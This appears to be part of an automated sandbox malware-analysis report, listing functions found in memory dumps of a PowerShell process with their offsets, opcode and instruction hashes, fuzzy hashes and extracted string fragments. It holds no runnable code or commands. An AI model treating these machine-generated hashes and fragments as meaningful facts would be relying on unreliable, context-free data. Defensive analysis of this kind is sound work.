                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 54e5a3d07c6e77eb03403e6e609be7cafdf5e84d8be89052602d328c03ec9564
                    • Instruction ID: 44104ae1034e6c529e6718c4ff256bbd50dae7f1b6359914e2f061afd80bbe5a
                    • Opcode Fuzzy Hash: 54e5a3d07c6e77eb03403e6e609be7cafdf5e84d8be89052602d328c03ec9564
                    • Instruction Fuzzy Hash: F6516E7090E3D55FC702DB7CC8A45DABFB0EF46314B1980D7C484DB2A7D668A849CBA6
                    Function 04D09859 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: af783d279f2e4644e9159b50ffc12b3d6ea3762df82dfb7c2fc0ac5a906f940c
                    • Instruction ID: d418d1a99ff48e9f3ec6df73074f612acb73d4104155fde00fd4a7d3b0ca4c4f
                    • Opcode Fuzzy Hash: af783d279f2e4644e9159b50ffc12b3d6ea3762df82dfb7c2fc0ac5a906f940c
                    • Instruction Fuzzy Hash: B6417E75A002049FDB14DF65D558BAD7BF6FF89754F0480A8E406EB7A1CB38AC41CB50
                    Function 04D03449 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf4c082cd9aac6840b17a106362877a396d8af9ca5b921f9e749b3b7066684dd
                    • Instruction ID: 33e8e50eb4799603bfb48ed652cb9b2eaff260466f9bcb9fa7ba8ab8a5559f94
                    • Opcode Fuzzy Hash: bf4c082cd9aac6840b17a106362877a396d8af9ca5b921f9e749b3b7066684dd
                    • Instruction Fuzzy Hash: 15410574A005059FCB09CF98C5D8AAAFBB1FF48310B25855AD945AB3A4C732FD91CFA4
                    Function 07CB6B7E Relevance: .1, Instructions: 102COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 69050f693aafc3594bc776f96c3418b2cbe662e7738a8ae7e54629aeb0b7efe6
                    • Instruction ID: 43ccb834b19f40c9a3989c36fb0edcc72b72548487b51e3df6d34101392aa057
                    • Opcode Fuzzy Hash: 69050f693aafc3594bc776f96c3418b2cbe662e7738a8ae7e54629aeb0b7efe6
                    • Instruction Fuzzy Hash: 39319374740114ABDB14A7A4C955BAF7BA3DF84704F10C424E9017F3A6CF7A9C468BE1
                    Function 07CB0C7F Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cea627f88d48f116e68c2b316afb193e44a553d93bed8b147ceb70950a8fac2b
                    • Instruction ID: 89fb5de99442ea61832b0b614cf5666ee47cf530f1fae6e05a9c13975ed06aac
                    • Opcode Fuzzy Hash: cea627f88d48f116e68c2b316afb193e44a553d93bed8b147ceb70950a8fac2b
                    • Instruction Fuzzy Hash: 7331E4B56002069FDF308F25C5807FBBBA5AF85700F54846AF844976A2D735EAC5CBA1
                    Function 07CB0C90 Relevance: .1, Instructions: 84COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c8498de6d5a722d9a530e8f1a049c0c696d718cf8352f84ff1e63340075d7e3
                    • Instruction ID: a78e2fe84f7e9aada4a6496fa5da7493bcf55918715438e2a0f823129e3dc3ef
                    • Opcode Fuzzy Hash: 8c8498de6d5a722d9a530e8f1a049c0c696d718cf8352f84ff1e63340075d7e3
                    • Instruction Fuzzy Hash: 1821D5F560021ADFDF348E29C5807FB77A5AF84740F548069F805972A1D735EAC5CBA1
                    Function 04D0C40C Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 112317dcdd5b06aa1b7742a883f4472a691a17594bb03c5f09b69cd611c10e31
                    • Instruction ID: 4d44aba01e0655cbc0dcbd0baf24e2df0d9de5dd6ebe41d9ebeedd4f60f33c5e
                    • Opcode Fuzzy Hash: 112317dcdd5b06aa1b7742a883f4472a691a17594bb03c5f09b69cd611c10e31
                    • Instruction Fuzzy Hash: 6E314130B01228CBCB269B74C8597EEB6B2AF49708F1544E9D405AB392DF35DE81CF81
                    Function 04D039B0 Relevance: .1, Instructions: 71COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 195fb18cd4e1e76364d4349a8b3dd9d4a3b4f4361af7dd18e4399e4fd343cfd8
                    • Instruction ID: a135b23f0acee6b38e04a6e22faa1c327e7abbaffdaa6a9946546764375e2fe1
                    • Opcode Fuzzy Hash: 195fb18cd4e1e76364d4349a8b3dd9d4a3b4f4361af7dd18e4399e4fd343cfd8
                    • Instruction Fuzzy Hash: 08210774A00209DFCB05CF9DC9809AAFBB1FF49310B158599E849EB761C735EC41CBA0
                    Function 04D04A79 Relevance: .1, Instructions: 69COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb247534b926afd571ac1a462884298c7d898453af8627f5cd165049206b0161
                    • Instruction ID: 9eca3e5a9f16db54a4aaf365772e20085262b5fedaf609a669a80d8c4dc57eba
                    • Opcode Fuzzy Hash: bb247534b926afd571ac1a462884298c7d898453af8627f5cd165049206b0161
                    • Instruction Fuzzy Hash: CD21D474A006099FCB44CF99C984AAAFBF5FF48310B148599E909E7761C731ED91CBA4
                    Function 04D02B38 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a1c8a39de02047d732de3d2a39e04c2eef88944a3d896116c1635fde9ecadf6
                    • Instruction ID: 2b12e9237a0a4d1d1ae60103df9559ce5a0b4c165839481de602ec000f27d051
                    • Opcode Fuzzy Hash: 1a1c8a39de02047d732de3d2a39e04c2eef88944a3d896116c1635fde9ecadf6
                    • Instruction Fuzzy Hash: 5D214A74A052099FCB00CF58C484AAAFBF5FF89310B158499E848EB366C731FC40CBA1
                    Function 04D0F25B Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: af204082e1f5df2504266de4a073f04cf6c5c141c17158ed49496621403dd1aa
                    • Instruction ID: 5ebacf8da19c5cf654fa64b63e07707d38ebd9e9fd629f45f457200f95902b80
                    • Opcode Fuzzy Hash: af204082e1f5df2504266de4a073f04cf6c5c141c17158ed49496621403dd1aa
                    • Instruction Fuzzy Hash: 28115D38D05248EBEF35DBA4D5987ACB7B1BB4531DF24942EC001F71D0ABB4688ACB56
                    Function 04C9D01D Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317054460.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4c9d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6e1c51bc88313c9bd7329ca4a375a21b9ce606764518426deeb4fb8cd44e5c0
                    • Instruction ID: 6356175fd6d08ba891e69a981e0334e72f5278d73e1d4ed348f4fa0c4792b951
                    • Opcode Fuzzy Hash: a6e1c51bc88313c9bd7329ca4a375a21b9ce606764518426deeb4fb8cd44e5c0
                    • Instruction Fuzzy Hash: 0B017B31104300BADB208E16DD88B63FFDCEF46320F0CC569ED4A1B242D239AD41C6B1
                    Function 04C9D01C Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317054460.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4c9d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d763e9088bed1f7ada60d518b7985f638e588d36dcaeeab7f61c20fcc8cd1e35
                    • Instruction ID: acd8bb525ec9f51a5e2c4e39e15cc7ae2bd3ea4bf3fd83e0ed1576bc65a44e0a
                    • Opcode Fuzzy Hash: d763e9088bed1f7ada60d518b7985f638e588d36dcaeeab7f61c20fcc8cd1e35
                    • Instruction Fuzzy Hash: 7EF0C271005344BEEB108E16DD88B62FFD8EF46734F18C55AED481F286C279A841CAB0
                    Function 04D035A5 Relevance: .0, Instructions: 23COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 930ea38a98d660c3da8d6a19c11ab8fafc7377e1eace37681348a72c1675d153
                    • Instruction ID: acc527af8c47e5378bbc18df4481345cb0e3a8b55941e199ad9259bd7fb9d930
                    • Opcode Fuzzy Hash: 930ea38a98d660c3da8d6a19c11ab8fafc7377e1eace37681348a72c1675d153
                    • Instruction Fuzzy Hash: 85E092357092848FCB02CB5CD8645DCBBB0EF4A324B1982D7D89497293C322AC16CB10

                    Non-executed Functions

                    Function 04C9D6E0 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317054460.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4c9d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 906ecb959d5724b9272f9f6a3d891a410dc32ba89730007fa0dfce91ab6cb6ba
                    • Instruction ID: 5ef80eeebdc3bb54f6f6643d1e10346303dd17cc1f4f5e143eab86775e1c28b1
                    • Opcode Fuzzy Hash: 906ecb959d5724b9272f9f6a3d891a410dc32ba89730007fa0dfce91ab6cb6ba
                    • Instruction Fuzzy Hash: B0210672604300EFCF05DF14D9C4B16BFA6FB84310F248569D90A1B25AC33AE855DAA2
                    Function 07CBCC30 Relevance: 20.4, Strings: 16, Instructions: 394COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$TQbq$TQbq$TQbq$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-26033926
                    • Opcode ID: a05948931c6f92ed49f226cdd9eaa2f0b138b3f4c55b4955cdf203c03c9c1636
                    • Instruction ID: a69e08291fd0e1a1cd346b8d03d6dbbf5cd75cbb803bdf726731d3dcf5c5407c
                    • Opcode Fuzzy Hash: a05948931c6f92ed49f226cdd9eaa2f0b138b3f4c55b4955cdf203c03c9c1636
                    • Instruction Fuzzy Hash: D4D137B170020ACFCB358F69D5946EA7BA2EF85311F1484AAF852DB291CB31DE45C7B1
                    Function 07CBBC90 Relevance: 14.1, Strings: 11, Instructions: 365COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-2004741541
                    • Opcode ID: b6b6059d00aa6fd649c8ba10ee943482a292c4b0e6963abd4d527fd4e8247c6b
                    • Instruction ID: 7c64a31f1cfc4b1cbd85e9f451c2bb79388480771e75a25ffdb1e432212bb972
                    • Opcode Fuzzy Hash: b6b6059d00aa6fd649c8ba10ee943482a292c4b0e6963abd4d527fd4e8247c6b
                    • Instruction Fuzzy Hash: 45C103F5B0020ADFCB388F69D4906EAB7A1EF81321F14C46AF8558B254DB35DE41CBA1
                    Function 07CBD148 Relevance: 14.1, Strings: 11, Instructions: 306COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                    • API String ID: 0-3029092631
                    • Opcode ID: 38f2c1a1c78e711f440716dc4b1264641c853270c0b1c5caf7c9b78b6b212e81
                    • Instruction ID: aafcb7da9dd41db02eac0e3be981ebf43e2da6ac89a58ec4c88f671b38b26f12
                    • Opcode Fuzzy Hash: 38f2c1a1c78e711f440716dc4b1264641c853270c0b1c5caf7c9b78b6b212e81
                    • Instruction Fuzzy Hash: 9DB10AB47002159FCB348F69C984AEABBF6EF89310F148465F8069B395CB31DD45CBA2
                    Function 07CBC8D0 Relevance: 11.5, Strings: 9, Instructions: 229COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                    • API String ID: 0-3118609902
                    • Opcode ID: 2eabf89c77d5fa518dc0427a9881f800cd20691e94578b7634011cf83eba36e5
                    • Instruction ID: 2bd64e60eec8a596ae3fbeca706095976bfc13d52fa213c3509b118c3e5afd8e
                    • Opcode Fuzzy Hash: 2eabf89c77d5fa518dc0427a9881f800cd20691e94578b7634011cf83eba36e5
                    • Instruction Fuzzy Hash: 737116B1B002159FDB388F69C590AEEBBA6EF84710F14886AF8059B350DB31DE41C7B1
                    Function 07CBD800 Relevance: 10.3, Strings: 8, Instructions: 286COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-1910532044
                    • Opcode ID: 9aa49b748d37fc7476a27a91eac4dd6b6ac5e8a52b71151e8227b23058b86dea
                    • Instruction ID: 4d2f4ee00ecd56c87f035870e86d14c82dc5d42842c084b2847c973aebe644c4
                    • Opcode Fuzzy Hash: 9aa49b748d37fc7476a27a91eac4dd6b6ac5e8a52b71151e8227b23058b86dea
                    • Instruction Fuzzy Hash: 31A1F8B0B1020ADFCB398F69C5847EA7BA6EF85311F548465F8469B294CB31DE41CBA1
                    Function 07CB1C80 Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-1910532044
                    • Opcode ID: e6c6ff9c11c859939cd17aef020a52a1be2748ad8669c7cabaa7fbe70fb08b5a
                    • Instruction ID: b7ab07bc140638d8ce733229020df8c7c62e627e417ae55731fca1d61320e70d
                    • Opcode Fuzzy Hash: e6c6ff9c11c859939cd17aef020a52a1be2748ad8669c7cabaa7fbe70fb08b5a
                    • Instruction Fuzzy Hash: 1F5109B1B0010D9FCB398FA9C4A4AEAB7E6AF85710F18C469F9559B250CB31DA41CB91
                    Function 07CB2810 Relevance: 10.2, Strings: 8, Instructions: 167COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-3118171705
                    • Opcode ID: b6061349e98bbf182a0fedef761a4eac6857a07cd582cfd508120104821767ac
                    • Instruction ID: abcacfdcf38a7741f8d11ba077ac22925995886bad9aa177c966a40ac9fcccb2
                    • Opcode Fuzzy Hash: b6061349e98bbf182a0fedef761a4eac6857a07cd582cfd508120104821767ac
                    • Instruction Fuzzy Hash: 40514BB2B143169FDB354E29C8D46A67BD5FF82610F18446AF849CB251CA36CE41C7A1
                    Function 07CBD137 Relevance: 9.0, Strings: 7, Instructions: 230COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                    • API String ID: 0-537408273
                    • Opcode ID: 823c64b84c23035315fc94d07b8d0c4932423d9fc0cae48e3da0cfd65125ab13
                    • Instruction ID: 95c7e2d283852b9d032e1dc056d3bd0582c1da6cac32031344ceeaaf5ae6e96b
                    • Opcode Fuzzy Hash: 823c64b84c23035315fc94d07b8d0c4932423d9fc0cae48e3da0cfd65125ab13
                    • Instruction Fuzzy Hash: B281A5B5700216DFCB34CF55C580AEAB7B2AF89711F198495F806AB291CB31DE85CB61
                    Function 07CBCDF8 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
                    • API String ID: 0-2778409501
                    • Opcode ID: a061fcb7da650f130ae8b0862c5c08df0ca9731509848a460bb43c1019f2ec54
                    • Instruction ID: 7f283f970db6ec0a0414a7f2932fac91d6455e368dc86760953eaeb3f9c94b71
                    • Opcode Fuzzy Hash: a061fcb7da650f130ae8b0862c5c08df0ca9731509848a460bb43c1019f2ec54
                    • Instruction Fuzzy Hash: A951B2B0710206DFCB34CE59D584BE6B7B2BF85711F5880A6F8069B290C771EE81DBA1
                    Function 07CB8420 Relevance: 7.7, Strings: 6, Instructions: 211COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-3723351465
                    • Opcode ID: 82067f94ef81a542781cf4c2636c62d3dd9640b94d01ee24d515780c9f2404c7
                    • Instruction ID: 3a35715782d32f2058af3e859d8e4f861013faf0a6492b8e258182a99fc3e398
                    • Opcode Fuzzy Hash: 82067f94ef81a542781cf4c2636c62d3dd9640b94d01ee24d515780c9f2404c7
                    • Instruction Fuzzy Hash: D5518BB17043168FDB394A7998906FABBE99FC5211F18847BE445CB281DA35C905C7E2
                    Function 07CBC8B2 Relevance: 7.7, Strings: 6, Instructions: 156COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
                    • API String ID: 0-3562389410
                    • Opcode ID: 6fffc6c9fb183b53e45d83729796a48d0043a088fb4765feec4b87b9da6b3a13
                    • Instruction ID: a3d67092b416368eeb9b56083897acf0314f7c3aaf4e973c86354eeff3b86c95
                    • Opcode Fuzzy Hash: 6fffc6c9fb183b53e45d83729796a48d0043a088fb4765feec4b87b9da6b3a13
                    • Instruction Fuzzy Hash: 2F51D6B1A00205DFDB38CF65C584BEABBA2EF55710F198596F805AB291D731DE40CBB1
                    Function 07CBD7EF Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                    • API String ID: 0-2702571027
                    • Opcode ID: 08c944367704e65e0be3bdcb4357657901e34fce1745bae31aa9fb93cfad801b
                    • Instruction ID: 7a4ae66c066ac7c61525bf12c1b8b931b9b1f54e75f296c12a43de9120f86b0a
                    • Opcode Fuzzy Hash: 08c944367704e65e0be3bdcb4357657901e34fce1745bae31aa9fb93cfad801b
                    • Instruction Fuzzy Hash: 9A61B4F0B14206DFDB38CE15C5847FAB7A2AF85712F1484A6F8065B294C775DE81CBA1
                    Function 07CB4338 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: 313d7e5369e2fee8413eaba9bd1eec57dc127c9e91bdeec67cf6e8be21c71585
                    • Instruction ID: 553a7f86a88b49592388bc66b03c8939e198f9f055c6b66a06e4cf973e6cdbb1
                    • Opcode Fuzzy Hash: 313d7e5369e2fee8413eaba9bd1eec57dc127c9e91bdeec67cf6e8be21c71585
                    • Instruction Fuzzy Hash: 8C412CB5B08256CFCF3C8E6985805EAB7E5EFC4251F18847AE84587202DB31CB55CBA1
                    Function 07CB1C6F Relevance: 6.4, Strings: 5, Instructions: 118COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                    • API String ID: 0-2702571027
                    • Opcode ID: 0df9adbd2a6f3a77349125e3746cb3628f2e975c5e9756edde060bb44782a14f
                    • Instruction ID: a92e11c796b063f4cd3b402a5ce6c53706b32dc2eff116863d760e082bb3f861
                    • Opcode Fuzzy Hash: 0df9adbd2a6f3a77349125e3746cb3628f2e975c5e9756edde060bb44782a14f
                    • Instruction Fuzzy Hash: D44116B1A1020DDFDB398F95C4A8BE6B7B1AB45720F5C8066F4155B290C731DA40CBA1
                    Function 07CB27FF Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$$]q$$]q$$]q$$]q
                    • API String ID: 0-2705583504
                    • Opcode ID: 48d1940fddbff5926425d0dfe6091dfebc993db1d2fe718a9d9c61517ad68a8d
                    • Instruction ID: 01cccf9e933bd81f75bb946b40b0ec355e66d85e1410cd243b36629931e6e021
                    • Opcode Fuzzy Hash: 48d1940fddbff5926425d0dfe6091dfebc993db1d2fe718a9d9c61517ad68a8d
                    • Instruction Fuzzy Hash: 3D31E4B2A14346DFCB354E16C4C0BF6BBA4BF42651F1840A7F848CB155C736CA84C761
                    Function 07CBC9F6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                    • API String ID: 0-1723543176
                    • Opcode ID: 634fc13dc756a0b906f8b1827a0cf7928956427a046f0588522e08cb2fdf82a3
                    • Instruction ID: 1b46150696e92401950be32eea4aea050b818d0369804601cc409c3e3497e52e
                    • Opcode Fuzzy Hash: 634fc13dc756a0b906f8b1827a0cf7928956427a046f0588522e08cb2fdf82a3
                    • Instruction Fuzzy Hash: F131C2B0B002059FCB38CF58C580AAEBBA2FB88B14F25C955F905AB350C731DE01CBA1
                    Function 07CB00F0 Relevance: 5.3, Strings: 4, Instructions: 310COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    • Opcode ID: aa987dbbd3e401ac8988670da6e3425e4b6112894df8699d8fcbcc6b27f19897
                    • Instruction ID: 275eff08eba8a7b14ea9d4586054b1c4871868d1e0fbafb725d5b45dc32e5ba4
                    • Opcode Fuzzy Hash: aa987dbbd3e401ac8988670da6e3425e4b6112894df8699d8fcbcc6b27f19897
